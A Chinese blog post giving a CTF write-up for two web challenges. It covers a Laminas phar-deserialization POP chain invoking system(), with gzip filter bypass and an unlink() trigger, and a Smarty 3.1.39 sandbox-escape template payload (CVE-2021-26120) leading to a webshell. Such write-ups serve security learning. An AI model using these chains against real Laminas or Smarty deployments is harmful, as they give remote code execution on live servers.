2022红明谷ctf

红明谷ctf

Fan website

考点:

1.phar反序列化

dirsearch扫出了www.zip,下载下来获得源码

网上找个链子Zend FrameWork Pop Chain - 先知社区 (aliyun.com)

用其中的这条

<?php

namespace Laminas\View\Resolver{
    class TemplateMapResolver{
        protected $map = ["setBody"=>"system"];
    }
}
namespace Laminas\View\Renderer{
    class PhpRenderer{
        private $__helpers;
        function __construct(){
            $this->__helpers = new \Laminas\View\Resolver\TemplateMapResolver();
        }
    }
}


namespace Laminas\Log\Writer{
    abstract class AbstractWriter{}

    class Mail extends AbstractWriter{
        protected $eventsToMail = ["ls"];  
        protected $subjectPrependText = null;
        protected $mail;
        function __construct(){
            $this->mail = new \Laminas\View\Renderer\PhpRenderer();
        }
    }
}

namespace Laminas\Log{
    class Logger{
        protected $writers;
        function __construct(){
            $this->writers = [new \Laminas\Log\Writer\Mail()];
        }
    }
}


namespace{
$a = new \Laminas\Log\Logger();
echo base64_encode(serialize($a));
}

现在目标就是找到一个触发点

在这个路径下/module/Album/src/Controller/AlbumController.php,发现可以实现文件上传

文件删除

public function imgdeleteAction()
    {
        $request = $this->getRequest();
        if(isset($request->getPost()['imgpath'])){
            $imgpath = $request->getPost()['imgpath'];
            $base = substr($imgpath,-4,4);
            if(in_array($base,$this->white_list)){     //白名单
                @unlink($imgpath);
            }else{
                echo 'Only Img File Can Be Deleted!';
            }
        }
    }

文件上传

public function imguploadAction()
    {
        $form = new UploadForm('upload-form');

        $request = $this->getRequest();
        if ($request->isPost()) {
            // Make certain to merge the $_FILES info!
            $post = array_merge_recursive(
                $request->getPost()->toArray(),
                $request->getFiles()->toArray()
            );

            $form->setData($post);
            if ($form->isValid()) {
                $data = $form->getData();
                $base = substr($data["image-file"]["name"],-4,4);
                if(in_array($base,$this->white_list)){   //白名单限制
                    $cont = file_get_contents($data["image-file"]["tmp_name"]);
                    if (preg_match("/<\?|php|HALT\_COMPILER/i", $cont )) {
                        die("Not This");
                    }
                    if($data["image-file"]["size"]<3000){
                        die("The picture size must be more than 3kb");
                    }
                    $img_path = realpath(getcwd()).'/public/img/'.md5($data["image-file"]["name"]).$base;
                    echo $img_path;
                    $form->saveImg($data["image-file"]["tmp_name"],$img_path);
                }else{
                    echo 'Only Img Can Be Uploaded!';
                }
                // Form is valid, save the form!
                //return $this->redirect()->toRoute('upload-form/success');
            }
        }

看这段

if (preg_match("/<\?|php|HALT\_COMPILER/i", $cont )) {
                        die("Not This");
                    }
                    if($data["image-file"]["size"]<3000){
                        die("The picture size must be more than 3kb");
                    }

对我们上传的文件做了一些限制

1.不能出现<?php __HALT_COMPILER()  可用gzip方式绕过
2.上传的文件大小必须大于3kb

delete函数中

if(in_array($base,$this->white_list)){     //白名单
                @unlink($imgpath);

unlink()函数是文件操作函数,可以触发phar反序列化的

结合以上信息,有链子,有触发点

很显然这题应该就是phar反序列化了

审计代码发现有个album路由,所以访问imguploadAction()方法也就是访问album/imgupload

POC

<?php

namespace Laminas\View\Resolver{
    class TemplateMapResolver{
        protected $map = ["setBody"=>"system"];
    }
}
namespace Laminas\View\Renderer{
    class PhpRenderer{
        private $__helpers;
        function __construct(){
            $this->__helpers = new \Laminas\View\Resolver\TemplateMapResolver();
        }
    }
}


namespace Laminas\Log\Writer{
    abstract class AbstractWriter{}

    class Mail extends AbstractWriter{
        protected $eventsToMail = ["cat /flag"];  
        protected $subjectPrependText = null;
        protected $mail;
        function __construct(){
            $this->mail = new \Laminas\View\Renderer\PhpRenderer();
        }
    }
}

namespace Laminas\Log{
    class Logger{
        protected $writers;
        function __construct(){
            $this->writers = [new \Laminas\Log\Writer\Mail()];
        }
    }
}


namespace{
    $a = new \Laminas\Log\Logger();
    $phar = new Phar("shell.phar"); 
    $phar -> setStub("撑起大小啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊<?php __HALT_COMPILER(); ?>"); 
    $phar -> setMetadata($a);
    $phar -> addFromString("test.txt",""); 
    $phar -> stopBuffering();
}
?>

首先利用这个本地生成shell.phar

之后拿到kali去gzip,gzip shell.phar,然后改个后缀,改成shell.jpg

到album/imgupload去上传,成功后会返回路径,最后在album/delete去触发它即可获得flag

Smarty_calculator

首页是什么都没有,dirsearch扫目录,发现www.zip和一个index/login,但是这个index/login没什么用

审计源码

在index.php里

有个对cookie的判断,这里令cookie:login=1即可绕过

burp截包,在计算框处可构造{{7*7}},返回49

构造{$smarty.version}可查看smarty版本,这里是为3.1.39

网上找,发现是CVE-2021-26120沙箱逃逸

当时做的时候都找到了这个cve,但是因为这里对输入的内容还有过滤,当时就以为不是这个。。。

payload

data={function name='(){};pHpinfo();function aaaa(){%0a/\*'}\*///{/function}

可以直接写个shell,因为php版本大于7,所以利用蚁剑绕过直接disable_function,获得flag

好像还可以转换为八进制绕过

posted @ 2022-07-06 14:22  phant0m1  阅读(208)  评论(0编辑  收藏  举报